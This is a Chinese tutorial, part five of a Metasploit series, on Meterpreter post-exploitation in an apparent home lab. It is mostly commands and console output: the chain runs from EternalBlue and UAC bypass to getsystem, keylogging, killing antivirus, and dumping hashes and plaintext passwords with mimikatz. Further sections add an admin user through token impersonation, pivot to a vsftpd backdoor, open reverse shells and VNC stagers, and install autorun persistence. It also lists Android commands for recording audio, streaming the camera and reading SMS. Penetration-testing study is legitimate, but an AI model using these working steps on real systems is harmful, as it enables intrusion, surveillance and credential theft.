基于Metasploit的软件渗透测试(五)

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: 基于Metasploit的软件渗透测试(五)

Meterpreter指南(后渗透技术)


基本命令

meterpreter常用命令


命令

作用

background

返回,把Meterpreter后台挂起

sessions

查看当前建立的会话


sessions -i number

与第n个会话进行交互


sessions -i

显示当前的回话


sessions -k number

与第n个会话进行交互关闭

bgkill

杀死一个 Meterpreter 脚本

bglist

提供所有正在运行的后台脚本的列表

bgrun

作为一个后台线程运行脚本

channel

显示活动频道

close

关闭通道

exit

终止 Meterpreter 会话

quit

终止 Meterpreter 会话

interact id

切换进一个信道

run

执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的autoroute,hashdump,arp_scanner,multi_meter_inject

irb

进入 Ruby 脚本模式

read

从通道读取数据write# 将数据写入到一个通道

use

加载 meterpreter 的扩展

load/use

加载模块

Resource

执行一个已有的rc脚本


针对安卓的命令

dump_contacts

获取手机通讯录

dump_sms

获取短信记录

send_sms -d 15330252525 -t “hello”

控制实验手机发短信

geolocate

获取实验手机GPS定位信息

wlan_geolocate

获取实验手机Wi-Fi定位信息

record_mic -d 5

控制实验手机录音

webcam_list

获取实验手机相机设备

webcam_snap

控制实验手机拍照

webcam_stream

直播实验手机摄像头


针对Windows的一些命令

ps

查看进程:

getpid

查看当前进程号:

sysinfo

查看系统信息:

route

查看完整网络设置:

getsystem

自动提权

getuid

查看当前权限

pwd

  查看当前处于目标机的那个目录


其他命令

查看目标机是否为虚拟机:run post/windows/gather/checkvm

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia screengrab

获取相机设备:webcam_list

控制拍照:webcam_snap

直播摄像头:webcam_stream

控制录音:record_mic

查看当前目录:getlwd

导出当前用户密码哈希 run hashdump

用户名:SIDLM哈希:NTLM哈希:::

也可以使用下面这个命令导出权限更高 run windows/gather/smart_hashdump

抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin

直接获取明文密码(注意这个功能需要获取系统权限获取系统权限需要输入getsystem


Shell 脚本

进入Windows的终端shell


文件系统命令

文件交互指令

ID

Command

Description

1

cat

读取文件内容

2

cd

切换靶机目录

3

cp

复制文件到目标

4

mv

移动到目标

5

chmod

修改文件权限(比如chmod 777 shell.elf

6

del / rm

删除靶机文件

7

dir

打印靶机目录

8

mkdir

在靶机上创建目录

9

rmdir

删除靶机目录

10

edit

编辑文件

11

getlwd

打印本地目录

12

getwd

打印靶机目录

13

lcd

更改本地目录

14

lls

列出本地目录

15

ls

列出靶机文件目录

16

lpwd

打印本地目录

17

pwd

打印工作目录

19

search

搜索文件详情search -h


Linux权限

chmod 777 {文件名.后缀}

chmod 777 shell.elf


upload

上传文件到目标机主上,如upload setup.exe C:\windows\system32

download nimeia.txt /root/Desktop/

# 下载文件到本机上如:download C:\boot.ini /root/或者download C:\“ProgramFiles”\Tencent\QQ\Users\295******125\Msg2.0.db /root/


search

search 文件,如

search -d c:\ -f*.doc

search -d c:\Users\xiang\Desktop -f *.txt


enumdesktops

用户登录数


ipconfig

查看IP地址


其他命令

截屏

meterpreter > screenshot

Screenshot saved to: /home/jerry/BqXLvJAp.jpeg

image.png


获得系统信息

meterpreter > sysinfo
Computer                     : WIN-2VEIIKHJ7M8
OS                            : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture              : x64
System Language        : zh_CN
Domain                     : WORKGROUP
Logged On Users        : 2
Meterpreter              : x64/windows


获取键盘信息

meterpreter > ps
Process List
============
 PID   PPID  NameArch  Session  User  Path
  exe
 1184  1132  explorer.exex64   1  WIN-2VEIIKHJ7M8\小铃铛   C:\Windows\Explorer.EXE
meterpreter > migrate 1184 迁移到1184进程中
[*] Migrating from 2496 to 1184... 
[*] Migration completed successfully.  
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WIN-2VEIIKHJ7M8
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt 
[*] Recording keystrokes... 
^C[*] User interrupt.  
[*] Shutting down keylog recorder. Please wait...
# cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt
Keystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8\小铃铛 started at 2022-06-24 13:22:19 +0800
tgest
<^H><^H><^H><^H><^H><^H>test
I a
mFy<^H><^H>Gu
Xiang
www.
3
Keylog Recorder exited at 2022-06-24 13:24:03 +0800


提权


最基础的提权

meterpreter >
getuid
Server username:
E86004903967404\Administrator
meterpreter >
getsystem
...got system
via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
getuid
Server username:
NT AUTHORITY\SYSTEM


利用漏洞提权

Windows 7

meterpreter >
background
msf6
exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload
configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6
exploit(windows/smb/ms17_010_eternalblue) > use
exploit/windows/smb/ms17_010_eternalblue
[*] Using
configured payload windows/x64/meterpreter/reverse_tcp
msf6
exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1
SESSION =>
1msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168
rhost =>
192.168.0.168
msf6
exploit(windows/smb/ms17_010_eternalblue) > exploit


绕过UAC提权

Windows 7

用户账户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。

meterpreter >
background
msf6
exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] No payload
configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac)
> set session 2
session => 2
msf6
exploit(windows/local/bypassuac) > exploit
[*] Started
reverse TCP handler on 192.168.0.150:4444
[*] UAC is
Enabled, checking level...
[+] UAC is set
to Default
[+] BypassUAC
can bypass this setting, continuing...
[*] Meterpreter
session 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-19
15:45:06 +0800
meterpreter >
getuid
Server username:
WIN-2VEIIKHJ7M8\小铃铛
meterpreter >
getsystem
...got system
via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
getuid
Server username:
NT AUTHORITY\SYSTEM
meterpreter >


触发UAC机制

Windows 10

meterpreter
> background
[*]
Backgrounding session 1...
msf6
exploit(multi/handler) > use exploit/windows/local/ask
[*] No payload
configured, defaulting to windows/meterpreter/reverse_tcp
msf6
exploit(windows/local/ask) > set session 1
session => 1
msf6
exploit(windows/local/ask) > set filename payload.exe
filename =>
payload.exe
msf6 exploit(windows/local/ask)
> exploit
[*] Started
reverse TCP handler on 192.168.0.150:4444
[*] UAC is
Enabled, checking level...
[*] The user
will be prompted, wait for them to click 'Ok'
[*] Uploading
payload.exe - 73802 bytes to the filesystem...
[*] Executing
Command!
[*] Sending
stage (175686 bytes) to 192.168.0.106
[*] Meterpreter
session 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-27
11:39:52 +0800
meterpreter
> getsystem
...got system via technique 1 (Named
Pipe Impersonation (In Memory/Admin)).


获取用户名密码

提取密码哈希值

Windows 10

meterpreter > getsystem
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519:::
xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f::: 
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 736  644   lsass.exe  x64   0NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
meterpreter > migrate 736
[*] Migrating from 5724 to 736...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...'
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##   > http://blog.gentilkiwi.com/mimikatz
 '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/
Success. 
meterpreter > kiwi_cmd sekurlsa::logonpasswords
SID   : S-1-5-21-2772671008-4265266102-715737954-1001
       msv :      
        [00000003] Primary
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * NTLM : 4f151ab2d4afdef65f9664b0422ad83f
       tspkg :      
       wdigest :      
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * Password : (null)
       kerberos :      
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * Password : (null)
       ssp :      
       credman :      
       cloudap :      


重新进入

msf6 exploit(windows/local/ask) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 443
msf6 exploit(multi/handler) set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14 +0800
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14 +0800
meterpreter >


Windows7

meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 512  396   lsass.exe  x64   0NT AUTHORITY\SYSTEM  C:\Windows\system32\lsass.exe
meterpreter > migrate 512
[*] Migrating from 1672 to 512...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##   > http://blog.gentilkiwi.com/mimikatz
 '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session   : Interactive from 1
User Name :   : WIN-2VEIIKHJ7M8
        * LM   : 44efce164ab921caaad3b435b51404ee
        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
       tspkg :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       wdigest :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       kerberos :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       ssp :      
       credman :      
        [00000000]���
  PPgN
  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2022 19:25:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##   > https://blog.gentilkiwi.com/mimikatz
 '## v ##'   Vincent LE TOUX ( vincent.letoux@gmail.com )
  '#####'> https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session   : Interactive from 1
User Name : \Ô۔
Domain: WIN-2VEIIKHJ7M8
Logon Server  : WIN-2VEIIKHJ7M8
Logon Time: 2022/6/27 14:58:54
SID   : S-1-5-21-2305812133-3308626755-1024735854-1000
       msv :      
        [00000003] Primary
        * Username : \Ô۔
        * Domain   : WIN-2VEIIKHJ7M8
        * LM   : 44efce164ab921caaad3b435b51404ee
        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
       tspkg :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       wdigest :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       kerberos :      
        * Username : (null)
        *


重新进入

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14 +0800
meterpreter >


令牌假冒添加用户

meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 736  644   lsass.exe  x64   0NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe meterpreter > steal_token 736
Stolen token with username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
DESKTOP-9A8VFKB\xiang
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\ReportServer
Window Manager\DWM-1
Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\ANONYMOUS LOGON
NT SERVICE\MSSQLFDLauncher
NT SERVICE\MSSQLSERVER
NT SERVICE\MSSQLServerOLAPService
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > add_user tom 123456 -h 192.168.0.106
[*] Attempting to add user tom to host 192.168.0.106
[+] Successfully added user
meterpreter > add_group_user "administrators" tom -h 192.168.0.106


跳板


目标为安装vsftpd V2.3.4的Linux机器

Windows10->vsftpd V2.3.4的Linux机器

meterpreter >
run get_local_subnets
[!] Meterpreter
scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run
post/multi/manage/autoroute OPTION=value [...]
Local subnet:
192.168.0.0/255.255.255.0
Local subnet:
192.168.5.0/255.255.255.0
Local subnet:
192.168.81.0/255.255.255.0
meterpreter >
background
[*]
Backgrounding session 3...
msf6
exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3
[*] Route added
msf6
exploit(windows/local/ask) > route print
IPv4 Active
Routing Table
=========================
 Subnet             Netmask            Gateway
 ------             -------            -------
 192.168.0.0        255.255.255.0      Session 3
[*] There are
currently no IPv6 routes defined.
msf6
exploit(windows/smb/ms17_010_eternalblue) > use
exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload
configured, defaulting to cmd/unix/interact
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload =>
cmd/unix/interact
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171
rhost =>
192.168.0.171
sf6
exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*]
192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4)
[*]
192.168.0.171:21 - USER: 331 Please specify the password.
[+]
192.168.0.171:21 - Backdoor service has been spawned, handling...
[+]
192.168.0.171:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command
shell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 via
session 3) at 2022-07-19 17:00:32 +0800


使用Meterpreter运行脚本

运行VNC

Windows 10

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Users\xiang\AppData\Local\Temp\eiISyc.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
[-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
到windows里面运行C:\Users\xiang\AppData\Local\Temp\eiISyc.exe会看到效果
meterpreter > [*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32 +0800
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "desktop-9a8vfkb"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding


Windows 7

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\YNpMWsIZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
[*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50 +0800
Desktop name "win-2veiikhj7m8"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

image.png


迁移进程

meterpreter > run post/windows/manage/migrate
[*] Running module against DESKTOP-9A8VFKB
[*] Current server process: payload.exe (8716)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 9944
[+] Successfully migrated into process 9944


关闭杀毒软件

meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...


获取系统密码哈希值

meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[-] Error: ArgumentError wrong number of arguments (given 4, expected 5) …


所以改用

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against DESKTOP-9A8VFKB
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]        Obtaining the boot key...
[*]        Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*]        Obtaining the user list and keys...
[*]        Decrypting user keys...
[*]        Dumping password hints...
[*]        No users with password hints on this system
[*]        Dumping password hashes...
[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]        xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]        tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::


获取目标机上流量

目标机必须支持:rpcapd service,在Windows上安装winpcap即可

meterpreter > run post/windows/manage/rpcapd_start
[*] Checking if machine DESKTOP-9A8VFKB has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002)
[+] Rpcapd started successfully: C:\Program Files (x86)\winpcap\rpcapd.exe -d -p 2002 -n


获取系统信息

Windows 10

meterpreter >run scraper
[*] New session on 192.168.0.106:7216...
[*] Gathering basic system information...
[-] Failed to run command net view
[-] Error: Rex::TimeoutError Operation timed out.
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\xiang\AppData\Local\Temp\WLNUaYcc.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[-] Failed to run command reg.exe export HKLM C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg
[-] Error: Rex::TimeoutError Operation timed out.
[*]  Downloading HKLM (C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg)
[*] Exception: Rex::Post::


Windows 7

meterpreter > run scraper
[*] New session on 192.168.0.158:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Windows\TEMP\sbOwIdlG.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\Windows\TEMP\pQzbPtfD.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\Windows\TEMP\xdgVency.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\Windows\TEMP\aWoyKSRV.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\Windows\TEMP\abgTRNGl.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.0.158:445...


Windows 2003

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run scraper
[*] New session on 192.168.0.169:1438...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IatUIdPZ.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JcjKKLfF.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gLgAxVWq.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\KDJAycay.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\zebuwlsT.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.0.169:1438...


控制持久化

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106

启动meterpreter-X

50秒后重连:-i 50

使用端口8888-p 8888

目的IP 192.168.0.106-r 192.168.0.106

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888
[*] Persistent agent script is 99674 bytes long
[+] Persistent Script written to C:\Windows\TEMP\QQxsjpmT.vbs
[*] Executing script C:\Windows\TEMP\QQxsjpmT.vbs
[+] Agent executed with PID 2580
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB


Windows7成功


将命令行shell升级为Metewrpreter

msf6> use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z


-z:攻击成功,在后台,不进入

[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
